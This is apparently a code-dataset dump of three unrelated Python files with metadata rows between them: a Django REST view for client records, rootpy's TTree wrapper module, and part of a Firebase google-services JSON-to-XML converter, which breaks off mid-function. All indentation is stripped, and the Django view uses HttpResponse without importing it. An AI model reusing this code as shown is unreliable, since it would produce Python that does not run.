from django.core import serializers
from django.shortcuts import render
from simple_rest import Resource
from .models import Client
def index(request):
return render(request, 'index.html')
class Clients(Resource):
def get(self, request):
clients = Client.objects.all() \
.filter(name__contains = request.GET.get('name')) \
.filter(address__contains = request.GET.get('address'));
return HttpResponse(self.to_json(clients), content_type = 'application/json', status = 200)
def post(self, request):
Client.objects.create(
name = request.POST.get("name"),
age = request.POST.get("age"),
address = request.POST.get("address"),
married = True if request.POST.get("married") == 'true' else False
)
return HttpResponse(status = 201)
def put(self, request, client_id):
client = Client.objects.get(pk = client_id)
client.name = request.PUT.get("name")
client.age = request.PUT.get("age")
client.address = request.PUT.get("address")
client.married = True if request.PUT.get("married") == 'true' else False
client.save()
return HttpResponse(status = 200)
def delete(self, request, client_id):
client = Client.objects.get(pk = client_id)
client.delete()
return HttpResponse(status = 200)
def to_json(self, objects):
return serializers.serialize('json', objects)
|
mit
| -5,578,314,184,561,130,000
| 32.822222
| 99
| 0.631406
| false
| 3.994751
| false
| false
| false
|
qbuat/rootpy
|
rootpy/tree/tree.py
|
1
|
33528
|
# Copyright 2012 the rootpy developers
# distributed under the terms of the GNU General Public License
from __future__ import absolute_import
import sys
import re
import fnmatch
import uuid
import ROOT
from .. import log; log = log[__name__]
from .. import asrootpy, QROOT
from ..extern.ordereddict import OrderedDict
from ..context import set_directory, thread_specific_tmprootdir, do_nothing
from ..base import NamedObject
from ..decorators import snake_case_methods, method_file_check, method_file_cd
from ..plotting.base import Plottable
from ..plotting import Hist, Canvas
from ..memory.keepalive import keepalive
from .cut import Cut
from .treebuffer import TreeBuffer
from .treetypes import Scalar, Array, BaseChar
from .model import TreeModel
__all__ = [
'Tree',
'Ntuple',
]
class UserData(object):
pass
class BaseTree(NamedObject):
DRAW_PATTERN = re.compile(
'^(?P<branches>.+?)'
'(?P<redirect>\>\>[\+]?'
'(?P<name>[^\(]+)'
'(?P<binning>.+)?)?$')
def _post_init(self):
"""
The standard rootpy _post_init method that is used to initialize both
new Trees and Trees retrieved from a File.
"""
if not hasattr(self, '_buffer'):
# only set _buffer if model was not specified in the __init__
self._buffer = TreeBuffer()
self.read_branches_on_demand = False
self._branch_cache = {}
self._current_entry = 0
self._always_read = []
self.userdata = UserData()
self._inited = True
def always_read(self, branches):
"""
Always read these branches, even when in caching mode. Maybe you have
caching enabled and there are branches you want to be updated for each
entry even though you never access them directly. This is useful if you
are iterating over an input tree and writing to an output tree sharing
the same TreeBuffer and you want a direct copy of certain branches. If
you have caching enabled but these branches are not specified here and
never accessed then they will never be read from disk, so the values of
branches in memory will remain unchanged.
Parameters
----------
branches : list, tuple
these branches will always be read from disk for every GetEntry
"""
if type(branches) not in (list, tuple):
raise TypeError("branches must be a list or tuple")
self._always_read = branches
@classmethod
def branch_type(cls, branch):
"""
Return the string representation for the type of a branch
"""
typename = branch.GetClassName()
if not typename:
leaf = branch.GetListOfLeaves()[0]
typename = leaf.GetTypeName()
# check if leaf has multiple elements
length = leaf.GetLen()
if length > 1:
typename = '{0}[{1:d}]'.format(typename, length)
return typename
@classmethod
def branch_is_supported(cls, branch):
"""
Currently the branch must only have one leaf but the leaf may have one
or multiple elements
"""
return branch.GetNleaves() == 1
def create_buffer(self, ignore_unsupported=False):
"""
Create this tree's TreeBuffer
"""
bufferdict = OrderedDict()
for branch in self.iterbranches():
# only include activated branches
if not self.GetBranchStatus(branch.GetName()):
continue
if not BaseTree.branch_is_supported(branch):
log.warning(
"ignore unsupported branch `{0}`".format(branch.GetName()))
continue
bufferdict[branch.GetName()] = Tree.branch_type(branch)
self.set_buffer(TreeBuffer(
bufferdict,
ignore_unsupported=ignore_unsupported))
def create_branches(self, branches):
"""
Create branches from a TreeBuffer or dict mapping names to type names
Parameters
----------
branches : TreeBuffer or dict
"""
if not isinstance(branches, TreeBuffer):
branches = TreeBuffer(branches)
self.set_buffer(branches, create_branches=True)
def update_buffer(self, treebuffer, transfer_objects=False):
"""
Merge items from a TreeBuffer into this Tree's TreeBuffer
Parameters
----------
buffer : rootpy.tree.buffer.TreeBuffer
The TreeBuffer to merge into this Tree's buffer
transfer_objects : bool, optional (default=False)
If True then all objects and collections on the input buffer will
be transferred to this Tree's buffer.
"""
self._buffer.update(treebuffer)
if transfer_objects:
self._buffer.set_objects(treebuffer)
def set_buffer(self, treebuffer,
branches=None,
ignore_branches=None,
create_branches=False,
visible=True,
ignore_missing=False,
ignore_duplicates=False,
transfer_objects=False):
"""
Set the Tree buffer
Parameters
----------
treebuffer : rootpy.tree.buffer.TreeBuffer
a TreeBuffer
branches : list, optional (default=None)
only include these branches from the TreeBuffer
ignore_branches : list, optional (default=None)
ignore these branches from the TreeBuffer
create_branches : bool, optional (default=False)
If True then the branches in the TreeBuffer should be created.
Use this option if initializing the Tree. A ValueError is raised
if an attempt is made to create a branch with the same name as one
that already exists in the Tree. If False the addresses of existing
branches will be set to point at the addresses in this buffer.
visible : bool, optional (default=True)
If True then the branches will be added to the buffer and will be
accessible as attributes of the Tree.
ignore_missing : bool, optional (default=False)
If True then any branches in this buffer that do not exist in the
Tree will be ignored, otherwise a ValueError will be raised. This
option is only valid when ``create_branches`` is False.
ignore_duplicates : bool, optional (default=False)
If False then raise a ValueError if the tree already has a branch
with the same name as an entry in the buffer. If True then skip
branches that already exist. This option is only valid when
``create_branches`` is True.
transfer_objects : bool, optional (default=False)
If True, all tree objects and collections will be transferred from
the buffer into this Tree's buffer.
"""
# determine branches to keep while preserving branch order
if branches is None:
branches = treebuffer.keys()
if ignore_branches is not None:
branches = [b for b in branches if b not in ignore_branches]
if create_branches:
for name in branches:
value = treebuffer[name]
if self.has_branch(name):
if ignore_duplicates:
log.warning(
"Skipping entry in buffer with the same name "
"as an existing branch: `{0}`".format(name))
continue
raise ValueError(
"Attempting to create two branches "
"with the same name: `{0}`".format(name))
if isinstance(value, Scalar):
self.Branch(name, value,
'{0}/{1}'.format(
name, value.type))
elif isinstance(value, Array):
self.Branch(name, value,
'{0}[{2:d}]/{1}'.format(
name, value.type, len(value)))
else:
self.Branch(name, value)
else:
for name in branches:
value = treebuffer[name]
if self.has_branch(name):
self.SetBranchAddress(name, value)
elif not ignore_missing:
raise ValueError(
"Attempting to set address for "
"branch `{0}` which does not exist".format(name))
else:
log.warning(
"Skipping entry in buffer for which no "
"corresponding branch in the "
"tree exists: `{0}`".format(name))
if visible:
newbuffer = TreeBuffer()
for branch in branches:
if branch in treebuffer:
newbuffer[branch] = treebuffer[branch]
newbuffer.set_objects(treebuffer)
self.update_buffer(newbuffer, transfer_objects=transfer_objects)
def activate(self, branches, exclusive=False):
"""
Activate branches
Parameters
----------
branches : str or list
branch or list of branches to activate
exclusive : bool, optional (default=False)
if True deactivate the remaining branches
"""
if exclusive:
self.SetBranchStatus('*', 0)
if isinstance(branches, basestring):
branches = [branches]
for branch in branches:
if '*' in branch:
matched_branches = self.glob(branch)
for b in matched_branches:
self.SetBranchStatus(b, 1)
elif self.has_branch(branch):
self.SetBranchStatus(branch, 1)
def deactivate(self, branches, exclusive=False):
"""
Deactivate branches
Parameters
----------
branches : str or list
branch or list of branches to deactivate
exclusive : bool, optional (default=False)
if True activate the remaining branches
"""
if exclusive:
self.SetBranchStatus('*', 1)
if isinstance(branches, basestring):
branches = [branches]
for branch in branches:
if '*' in branch:
matched_branches = self.glob(branch)
for b in matched_branches:
self.SetBranchStatus(b, 0)
elif self.has_branch(branch):
self.SetBranchStatus(branch, 0)
@property
def branches(self):
"""
List of the branches
"""
return [branch for branch in self.GetListOfBranches()]
def iterbranches(self):
"""
Iterator over the branches
"""
for branch in self.GetListOfBranches():
yield branch
@property
def branchnames(self):
"""
List of branch names
"""
return [branch.GetName() for branch in self.GetListOfBranches()]
def iterbranchnames(self):
"""
Iterator over the branch names
"""
for branch in self.iterbranches():
yield branch.GetName()
def glob(self, patterns, exclude=None):
"""
Return a list of branch names that match ``pattern``.
Exclude all matched branch names which also match a pattern in
``exclude``. ``exclude`` may be a string or list of strings.
Parameters
----------
patterns: str or list
branches are matched against this pattern or list of patterns where
globbing is performed with '*'.
exclude : str or list, optional (default=None)
branches matching this pattern or list of patterns are excluded
even if they match a pattern in ``patterns``.
Returns
-------
matches : list
List of matching branch names
"""
if isinstance(patterns, basestring):
patterns = [patterns]
if isinstance(exclude, basestring):
exclude = [exclude]
matches = []
for pattern in patterns:
matches += fnmatch.filter(self.iterbranchnames(), pattern)
if exclude is not None:
for exclude_pattern in exclude:
matches = [match for match in matches
if not fnmatch.fnmatch(match, exclude_pattern)]
return matches
def __getitem__(self, item):
"""
Get an entry in the tree or a branch
Parameters
----------
item : str or int
if item is a str then return the value of the branch with that name
if item is an int then call GetEntry
"""
if isinstance(item, basestring):
return self._buffer[item]
self.GetEntry(item)
return self
def GetEntry(self, entry):
"""
Get an entry. Tree collections are reset
(see ``rootpy.tree.treeobject``)
Parameters
----------
entry : int
entry index
Returns
-------
ROOT.TTree.GetEntry : int
The number of bytes read
"""
if not (0 <= entry < self.GetEntries()):
raise IndexError("entry index out of range: {0:d}".format(entry))
self._buffer.reset_collections()
return super(BaseTree, self).GetEntry(entry)
def __iter__(self):
"""
Iterator over the entries in the Tree.
"""
if not self._buffer:
self.create_buffer()
if self.read_branches_on_demand:
self._buffer.set_tree(self)
# drop all branches from the cache
self.DropBranchFromCache('*')
for attr in self._always_read:
try:
branch = self._branch_cache[attr]
except KeyError: # one-time hit
branch = self.GetBranch(attr)
if not branch:
raise AttributeError(
"branch `{0}` specified in "
"`always_read` does not exist".format(attr))
self._branch_cache[attr] = branch
# add branches that we should always read to cache
self.AddBranchToCache(branch)
for i in xrange(self.GetEntries()):
# Only increment current entry.
# getattr on a branch will then GetEntry on only that branch
# see ``TreeBuffer.get_with_read_if_cached``.
self._current_entry = i
self.LoadTree(i)
for attr in self._always_read:
# Always read branched in ``self._always_read`` since
# these branches may never be getattr'd but the TreeBuffer
# should always be updated to reflect their current values.
# This is useful if you are iterating over an input tree
# and writing to an output tree that shares the same
# TreeBuffer but you don't getattr on all branches of the
# input tree in the logic that determines which entries
# to keep.
self._branch_cache[attr].GetEntry(i)
self._buffer._entry.set(i)
yield self._buffer
self._buffer.next_entry()
self._buffer.reset_collections()
else:
for i in xrange(self.GetEntries()):
# Read all activated branches (can be slow!).
super(BaseTree, self).GetEntry(i)
self._buffer._entry.set(i)
yield self._buffer
self._buffer.reset_collections()
def __setattr__(self, attr, value):
if '_inited' not in self.__dict__ or attr in self.__dict__:
return super(BaseTree, self).__setattr__(attr, value)
try:
return self._buffer.__setattr__(attr, value)
except AttributeError:
raise AttributeError(
"`{0}` instance has no attribute `{1}`".format(
self.__class__.__name__, attr))
def __getattr__(self, attr):
if '_inited' not in self.__dict__:
raise AttributeError(
"`{0}` instance has no attribute `{1}`".format(
self.__class__.__name__, attr))
try:
return getattr(self._buffer, attr)
except AttributeError:
raise AttributeError(
"`{0}` instance has no attribute `{1}`".format(
self.__class__.__name__, attr))
def __setitem__(self, item, value):
self._buffer[item] = value
def __len__(self):
"""
Same as GetEntries
"""
return self.GetEntries()
def __contains__(self, branch):
"""
Same as has_branch
"""
return self.has_branch(branch)
def has_branch(self, branch):
"""
Determine if this Tree contains a branch with the name ``branch``
Parameters
----------
branch : str
branch name
Returns
-------
has_branch : bool
True if this Tree contains a branch with the name ``branch`` or
False otherwise.
"""
return not not self.GetBranch(branch)
def csv(self, sep=',', branches=None,
include_labels=True, limit=None,
stream=None):
"""
Print csv representation of tree only including branches
of basic types (no objects, vectors, etc..)
Parameters
----------
sep : str, optional (default=',')
The delimiter used to separate columns
branches : list, optional (default=None)
Only include these branches in the CSV output. If None, then all
basic types will be included.
include_labels : bool, optional (default=True)
Include a first row of branch names labelling each column.
limit : int, optional (default=None)
Only include up to a maximum of ``limit`` rows in the CSV.
stream : file, (default=None)
Stream to write the CSV output on. By default the CSV will be
written to ``sys.stdout``.
"""
if stream is None:
stream = sys.stdout
if not self._buffer:
self.create_buffer(ignore_unsupported=True)
if branches is None:
branchdict = OrderedDict([
(name, self._buffer[name])
for name in self.iterbranchnames()
if isinstance(self._buffer[name], (Scalar, Array))])
else:
branchdict = OrderedDict()
for name in branches:
if not isinstance(self._buffer[name], (Scalar, Array)):
raise TypeError(
"selected branch `{0}` "
"is not a scalar or array type".format(name))
branchdict[name] = self._buffer[name]
if not branchdict:
raise RuntimeError(
"no branches selected or no "
"branches of scalar or array types exist")
if include_labels:
# expand array types to f[0],f[1],f[2],...
print >> stream, sep.join(
name if isinstance(value, (Scalar, BaseChar))
else sep.join('{0}[{1:d}]'.format(name, idx)
for idx in xrange(len(value)))
for name, value in branchdict.items())
# even though 'entry' is not used, enumerate or simply iterating over
# self is required to update the buffer with the new branch values at
# each tree entry.
for i, entry in enumerate(self):
print >> stream, sep.join(
str(v.value) if isinstance(v, (Scalar, BaseChar))
else sep.join(map(str, v))
for v in branchdict.values())
if limit is not None and i + 1 == limit:
break
def Scale(self, value):
"""
Scale the weight of the Tree by ``value``
Parameters
----------
value : int, float
Scale the Tree weight by this value
"""
self.SetWeight(self.GetWeight() * value)
def GetEntries(self, cut=None, weighted_cut=None, weighted=False):
"""
Get the number of (weighted) entries in the Tree
Parameters
----------
cut : str or rootpy.tree.cut.Cut, optional (default=None)
Only entries passing this cut will be included in the count
weighted_cut : str or rootpy.tree.cut.Cut, optional (default=None)
Apply a weighted selection and determine the weighted number of
entries.
weighted : bool, optional (default=False)
Multiply the number of (weighted) entries by the Tree weight.
"""
if weighted_cut:
hist = Hist(1, -1, 2)
branch = self.GetListOfBranches()[0].GetName()
weight = self.GetWeight()
self.SetWeight(1)
self.Draw('{0}=={1}>>{2}'.format(branch, branch, hist.GetName()),
weighted_cut * cut)
self.SetWeight(weight)
entries = hist.Integral()
elif cut:
entries = super(BaseTree, self).GetEntries(str(cut))
else:
entries = super(BaseTree, self).GetEntries()
if weighted:
entries *= self.GetWeight()
return entries
def GetMaximum(self, expression, cut=None):
"""
TODO: we need a better way of determining the maximum value of an
expression.
"""
if cut:
self.Draw(expression, cut, 'goff')
else:
self.Draw(expression, '', 'goff')
vals = self.GetV1()
n = self.GetSelectedRows()
vals = [vals[i] for i in xrange(min(n, 10000))]
return max(vals)
def GetMinimum(self, expression, cut=None):
"""
TODO: we need a better way of determining the minimum value of an
expression.
"""
if cut:
self.Draw(expression, cut, "goff")
else:
self.Draw(expression, "", "goff")
vals = self.GetV1()
n = self.GetSelectedRows()
vals = [vals[i] for i in xrange(min(n, 10000))]
return min(vals)
def CopyTree(self, selection, *args, **kwargs):
"""
Copy the tree while supporting a rootpy.tree.cut.Cut selection in
addition to a simple string.
"""
return super(BaseTree, self).CopyTree(str(selection), *args, **kwargs)
def reset_branch_values(self):
"""
Reset all values in the buffer to their default values
"""
self._buffer.reset()
@method_file_cd
def Write(self, *args, **kwargs):
super(BaseTree, self).Write(*args, **kwargs)
def Draw(self,
expression,
selection="",
options="",
hist=None,
create_hist=False,
**kwargs):
"""
Draw a TTree with a selection as usual, but return the created
histogram.
Parameters
----------
expression : str
The expression to draw. Multidimensional expressions are separated
by ":". rootpy reverses the expressions along each dimension so the
order matches the order of the elements identifying a location in
the resulting histogram. By default ROOT takes the expression "Y:X"
to mean Y versus X but we argue that this is counterintuitive and
that the order should be "X:Y" so that the expression along the
first dimension identifies the location along the first axis, etc.
selection : str or rootpy.tree.Cut, optional (default="")
The cut expression. Only entries satisfying this selection are
included in the filled histogram.
options : str, optional (default="")
Draw options passed to ROOT.TTree.Draw
hist : ROOT.TH1, optional (default=None)
The histogram to be filled. If not specified, rootpy will attempt
to find what ROOT created and return that.
create_hist : bool (default=False)
If True and `hist`` is not specified and a histogram name is not
specified in the draw expression, then override ROOT's
default behaviour and fill a new histogram. ROOT will otherwise add
points to a TGraph or TPolyMarker3D if not drawing in more than
two dimensions.
kwargs : dict, optional
Remaining keword arguments are used to set the style attributes of
the histogram.
Returns
-------
If ``hist`` is specified, None is returned. If ``hist`` is left
unspecified, an attempt is made to retrieve the generated histogram
which is then returned.
"""
# Check that we have a valid draw expression and pick out components
exprmatch = re.match(BaseTree.DRAW_PATTERN, expression)
if not exprmatch:
raise ValueError(
"not a valid draw expression: `{0}`".format(expression))
# Reverse variable order to match order in hist constructor
exprdict = exprmatch.groupdict()
fields = exprdict['branches'].split(':')
num_dimensions = len(fields)
expression = ':'.join(fields[:3][::-1] + fields[3:])
if exprdict['redirect'] is not None:
expression += exprdict['redirect']
if not isinstance(selection, Cut):
# Let Cut handle any extra processing (i.e. ternary operators)
selection = Cut(selection)
graphics = 'goff' not in options
if hist is not None:
if not isinstance(hist, ROOT.TH1):
raise TypeError("Cannot draw into a `{0}`".format(type(hist)))
# Check that the dimensionality of the expression and object match
if num_dimensions != hist.GetDimension():
raise TypeError(
"The dimensionality of the expression `{0}` ({1:d}) "
"does not match the dimensionality of a `{2}`".format(
expression, num_dimensions, hist.__class__.__name__))
# Handle graphics ourselves
if graphics:
if options:
options += ' '
options += 'goff'
if exprdict['name'] is None:
# Draw into histogram supplied by user
expression = '{0}>>+{1}'.format(expression, hist.GetName())
else:
if exprdict['name'] != hist.GetName():
# If the user specified a name to draw into then check that
# this is consistent with the specified object.
raise ValueError(
"The name specified in the draw "
"expression `{0}` does not match the "
"name of the specified object `{1}`".format(
exprdict['name'],
hist.GetName()))
# Check that binning is not specified
if exprdict['binning'] is not None:
raise ValueError(
"When specifying the object to draw into, do not "
"specify a binning in the draw expression")
else:
if create_hist and exprdict['name'] is None:
if num_dimensions > 4:
raise ValueError(
"Cannot create a histogram for expressions with "
"more than 4 dimensions")
newname = uuid.uuid4().hex
expression += '>>{0}'.format(newname)
exprdict['name'] = newname
pad = ROOT.gPad.func()
own_pad = False
if graphics and not pad:
# Create a new canvas if one doesn't exist yet
own_pad = True
pad = Canvas()
# Note: TTree.Draw() pollutes gDirectory, make a temporary one
with thread_specific_tmprootdir():
if hist is not None:
# If a custom histogram is specified (i.e, it's not being
# created root side), then temporarily put it into the
# temporary thread-specific directory.
context = set_directory(hist)
else:
context = do_nothing()
with context:
super(BaseTree, self).Draw(expression, selection, options)
if hist is None:
# Retrieve histogram made by TTree.Draw
if num_dimensions == 1 or exprdict['name'] is not None:
# a TH1
hist = asrootpy(self.GetHistogram(), warn=False)
elif num_dimensions == 2:
# a TGraph
hist = asrootpy(pad.GetPrimitive('Graph'), warn=False)
else:
# ROOT: For a three and four dimensional Draw the TPolyMarker3D
# is unnamed, and cannot be retrieved. Why, ROOT?
log.warning(
"Cannot retrieve the TPolyMarker3D for "
"3D and 4D expressions")
if graphics and own_pad:
# Since we cannot access the TPolyMarker3D we use self to
# keep the canvas alive
keepalive(self, pad)
if hist: # is not None
if isinstance(hist, Plottable):
hist.decorate(**kwargs)
# ROOT, don't try to delete this object! (See issue #277)
hist.SetBit(ROOT.kCanDelete, False)
if graphics:
if own_pad:
# The usual bug is that the histogram is garbage
# collected and we want the canvas to keep the
# histogram alive, but here the canvas has been
# created locally and we are returning the histogram,
# so we want the histogram to keep the canvas alive.
keepalive(hist, pad)
# Redraw the histogram since we may have specified style
# attributes in **kwargs
hist.Draw()
if graphics:
pad.Modified()
pad.Update()
return hist
def to_array(self, *args, **kwargs):
"""
Convert this tree into a NumPy structured array
"""
from root_numpy import tree2array
return tree2array(self, *args, **kwargs)
@snake_case_methods
class Tree(BaseTree, QROOT.TTree):
"""
Inherits from TTree so all regular TTree methods are available
but certain methods (i.e. Draw) have been overridden
to improve usage in Python.
Parameters
----------
name : str, optional (default=None)
The Tree name (a UUID if None)
title : str, optional (default=None)
The Tree title (empty string if None)
model : TreeModel, optional (default=None)
If specified then this TreeModel will be used to create the branches
"""
_ROOT = QROOT.TTree
@method_file_check
def __init__(self, name=None, title=None, model=None):
super(Tree, self).__init__(name=name, title=title)
self._buffer = TreeBuffer()
if model is not None:
if not issubclass(model, TreeModel):
raise TypeError("the model must subclass TreeModel")
self.set_buffer(model(), create_branches=True)
self._post_init()
def Fill(self, reset=False):
"""
Fill the Tree with the current values in the buffer
Parameters
----------
reset : bool, optional (default=False)
Reset the values in the buffer to their default values after
filling.
"""
super(Tree, self).Fill()
# reset all branches
if reset:
self._buffer.reset()
@snake_case_methods
class Ntuple(BaseTree, QROOT.TNtuple):
"""
Inherits from TNtuple so all regular TNtuple/TTree methods are available
but certain methods (i.e. Draw) have been overridden
to improve usage in Python.
Parameters
----------
varlist : list of str
A list of the field names
name : str, optional (default=None)
The Ntuple name (a UUID if None)
title : str, optional (default=None)
The Ntuple title (empty string if None)
bufsize : int, optional (default=32000)
Basket buffer size
"""
_ROOT = QROOT.TNtuple
@method_file_check
def __init__(self, varlist, name=None, title=None, bufsize=32000):
super(Ntuple, self).__init__(':'.join(varlist), bufsize,
name=name,
title=title)
self._post_init()
|
gpl-3.0
| -4,759,378,811,842,880,000
| 36.006623
| 79
| 0.547691
| false
| 4.87184
| false
| false
| false
|
Jason-Zhao-Jie/MagicTower
|
Assets/Firebase/Editor/generate_xml_from_google_services_json.py
|
1
|
13865
|
#!/usr/bin/python
# Copyright 2016 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Stand-alone implementation of the Gradle Firebase plugin.
Converts the services json file to xml:
https://googleplex-android.googlesource.com/platform/tools/base/+/studio-master-dev/build-system/google-services/src/main/groovy/com/google/gms/googleservices
"""
__author__ = 'Wouter van Oortmerssen'
import argparse
import json
import os
import sys
from xml.etree import ElementTree
# Input filename if it isn't set.
DEFAULT_INPUT_FILENAME = 'app/google-services.json'
# Output filename if it isn't set.
DEFAULT_OUTPUT_FILENAME = 'res/values/googleservices.xml'
# Input filename for .plist files, if it isn't set.
DEFAULT_PLIST_INPUT_FILENAME = 'GoogleService-Info.plist'
# Output filename for .json files, if it isn't set.
DEFAULT_JSON_OUTPUT_FILENAME = 'google-services-desktop.json'
# Indicates a web client in the oauth_client list.
OAUTH_CLIENT_TYPE_WEB = 3
def read_xml_value(xml_node):
"""Utility method for reading values from the plist XML.
Args:
xml_node: An ElementTree node, that contains a value.
Returns:
The value of the node, or None, if it could not be read.
"""
if xml_node.tag == 'string':
return xml_node.text
elif xml_node.tag == 'integer':
return int(xml_node.text)
elif xml_node.tag == 'real':
return float(xml_node.text)
elif xml_node.tag == 'false':
return 0
elif xml_node.tag == 'true':
return 1
else:
# other types of input are ignored. (data, dates, arrays, etc.)
return None
def construct_plist_dictionary(xml_root):
"""Constructs a dictionary of values based on the contents of a plist file.
Args:
xml_root: An ElementTree node, that represents the root of the xml file
that is to be parsed. (Which should be a dictionary containing
key-value pairs of the properties that need to be extracted.)
Returns:
A dictionary, containing key-value pairs for all (supported) entries in the
node.
"""
xml_dict = xml_root.find('dict')
if xml_dict is None:
return None
plist_dict = {}
i = 0
while i < len(xml_dict):
if xml_dict[i].tag == 'key':
key = xml_dict[i].text
i += 1
if i < len(xml_dict):
value = read_xml_value(xml_dict[i])
if value is not None:
plist_dict[key] = value
i += 1
return plist_dict
def construct_google_services_json(xml_dict):
"""Constructs a google services json file from a dictionary.
Args:
xml_dict: A dictionary of all the key/value pairs that are needed for the
output json file.
Returns:
A string representing the output json file.
"""
try:
json_struct = {
'project_info': {
'project_number': xml_dict['GCM_SENDER_ID'],
'firebase_url': xml_dict['DATABASE_URL'],
'project_id': xml_dict['PROJECT_ID'],
'storage_bucket': xml_dict['STORAGE_BUCKET']
},
'client': [{
'client_info': {
'mobilesdk_app_id': xml_dict['GOOGLE_APP_ID'],
'android_client_info': {
'package_name': xml_dict['BUNDLE_ID']
}
},
'oauth_client': [{
'client_id': xml_dict['CLIENT_ID'],
}],
'api_key': [{
'current_key': xml_dict['API_KEY']
}],
'services': {
'analytics_service': {
'status': xml_dict['IS_ANALYTICS_ENABLED']
},
'appinvite_service': {
'status': xml_dict['IS_APPINVITE_ENABLED']
}
}
},],
'configuration_version':
'1'
}
return json.dumps(json_struct, indent=2)
except KeyError as e:
sys.stderr.write('Could not find key in plist file: [%s]\n' % (e.args[0]))
return None
def convert_plist_to_json(plist_string, input_filename):
"""Converts an input plist string into a .json file and saves it.
Args:
plist_string: The contents of the loaded plist file.
input_filename: The file name that the plist data was read from.
Returns:
the converted string, or None if there were errors.
"""
try:
root = ElementTree.fromstring(plist_string)
except ElementTree.ParseError:
sys.stderr.write('Error parsing file %s.\n'
'It does not appear to be valid XML.\n' % (input_filename))
return None
plist_dict = construct_plist_dictionary(root)
if plist_dict is None:
sys.stderr.write('In file %s, could not locate a top-level \'dict\' '
'element.\n'
'File format should be plist XML, with a top-level '
'dictionary containing project settings as key-value '
'pairs.\n' % (input_filename))
return None
json_string = construct_google_services_json(plist_dict)
return json_string
def gen_string(parent, name, text):
"""Generate one <string /> element and put into the list of keeps.
Args:
parent: The object that will hold the string.
name: The name to store the string under.
text: The text of the string.
"""
if text:
prev = parent.get('tools:keep', '')
if prev:
prev += ','
parent.set('tools:keep', prev + '@string/' + name)
child = ElementTree.SubElement(parent, 'string', {
'name': name,
'translatable': 'false'
})
child.text = text
def indent(elem, level=0):
"""Recurse through XML tree and add indentation.
Args:
elem: The element to recurse over
level: The current indentation level.
"""
i = '\n' + level*' '
if elem is not None:
if not elem.text or not elem.text.strip():
elem.text = i + ' '
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
indent(elem, level+1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
def main():
parser = argparse.ArgumentParser(
description=((
'Converts a Firebase %s into %s similar to the Gradle plugin, or '
'converts a Firebase %s into a %s suitible for use on desktop apps.' %
(DEFAULT_INPUT_FILENAME, DEFAULT_OUTPUT_FILENAME,
DEFAULT_PLIST_INPUT_FILENAME, DEFAULT_JSON_OUTPUT_FILENAME))))
parser.add_argument('-i', help='Override input file name',
metavar='FILE', required=False)
parser.add_argument('-o', help='Override destination file name',
metavar='FILE', required=False)
parser.add_argument('-p', help=('Package ID to select within the set of '
'packages in the input file. If this is '
'not specified, the first package in the '
'input file is selected.'))
parser.add_argument('-l', help=('List all package IDs referenced by the '
'input file. If this is specified, '
'the output file is not created.'),
action='store_true', default=False, required=False)
parser.add_argument('-f', help=('Print project fields from the input file '
'in the form \'name=value\\n\' for each '
'field. If this is specified, the output '
'is not created.'),
action='store_true', default=False, required=False)
parser.add_argument(
'--plist',
help=(
'Specifies a plist file to convert to a JSON configuration file. '
'If this is enabled, the script will expect a .plist file as input, '
'which it will convert into %s file. The output file is '
'*not* suitable for use with Firebase on Android.' %
(DEFAULT_JSON_OUTPUT_FILENAME)),
action='store_true',
default=False,
required=False)
args = parser.parse_args()
if args.plist:
input_filename = DEFAULT_PLIST_INPUT_FILENAME
output_filename = DEFAULT_JSON_OUTPUT_FILENAME
else:
input_filename = DEFAULT_INPUT_FILENAME
output_filename = DEFAULT_OUTPUT_FILENAME
if args.i:
input_filename = args.i
if args.o:
output_filename = args.o
with open(input_filename, 'r') as ifile:
file_string = ifile.read()
json_string = None
if args.plist:
json_string = convert_plist_to_json(file_string, input_filename)
if json_string is None:
return 1
jsobj = json.loads(json_string)
else:
jsobj = json.loads(file_string)
root = ElementTree.Element('resources')
root.set('xmlns:tools', 'http://schemas.android.com/tools')
project_info = jsobj.get('project_info')
if project_info:
gen_string(root, 'firebase_database_url', project_info.get('firebase_url'))
gen_string(root, 'gcm_defaultSenderId', project_info.get('project_number'))
gen_string(root, 'google_storage_bucket',
project_info.get('storage_bucket'))
gen_string(root, 'project_id', project_info.get('project_id'))
if args.f:
if not project_info:
sys.stderr.write('No project info found in %s.' % input_filename)
return 1
for field, value in project_info.iteritems():
sys.stdout.write('%s=%s\n' % (field, value))
return 0
packages = set()
client_list = jsobj.get('client')
if client_list:
# Search for the user specified package in the file.
selected_package_name = ''
selected_client = client_list[0]
find_package_name = args.p
for client in client_list:
package_name = client.get('client_info', {}).get(
'android_client_info', {}).get('package_name', '')
if not package_name:
package_name = client.get('oauth_client', {}).get(
'android_info', {}).get('package_name', '')
if package_name:
if not selected_package_name:
selected_package_name = package_name
selected_client = client
if package_name == find_package_name:
selected_package_name = package_name
selected_client = client
packages.add(package_name)
if args.p and selected_package_name != find_package_name:
sys.stderr.write('No packages found in %s which match the package '
'name %s\n'
'\n'
'Found the following:\n'
'%s\n' % (input_filename, find_package_name,
'\n'.join(packages)))
return 1
client_api_key = selected_client.get('api_key')
if client_api_key:
client_api_key0 = client_api_key[0]
gen_string(root, 'google_api_key', client_api_key0.get('current_key'))
gen_string(root, 'google_crash_reporting_api_key',
client_api_key0.get('current_key'))
client_info = selected_client.get('client_info')
if client_info:
gen_string(root, 'google_app_id', client_info.get('mobilesdk_app_id'))
oauth_client_list = selected_client.get('oauth_client')
if oauth_client_list:
for oauth_client in oauth_client_list:
client_type = oauth_client.get('client_type')
client_id = oauth_client.get('client_id')
if client_type and client_type == OAUTH_CLIENT_TYPE_WEB and client_id:
gen_string(root, 'default_web_client_id', client_id)
# Only include the first matching OAuth web client ID.
break
services = selected_client.get('services')
if services:
ads_service = services.get('ads_service')
if ads_service:
gen_string(root, 'test_banner_ad_unit_id',
ads_service.get('test_banner_ad_unit_id'))
gen_string(root, 'test_interstitial_ad_unit_id',
ads_service.get('test_interstitial_ad_unit_id'))
analytics_service = services.get('analytics_service')
if analytics_service:
analytics_property = analytics_service.get('analytics_property')
if analytics_property:
gen_string(root, 'ga_trackingId',
analytics_property.get('tracking_id'))
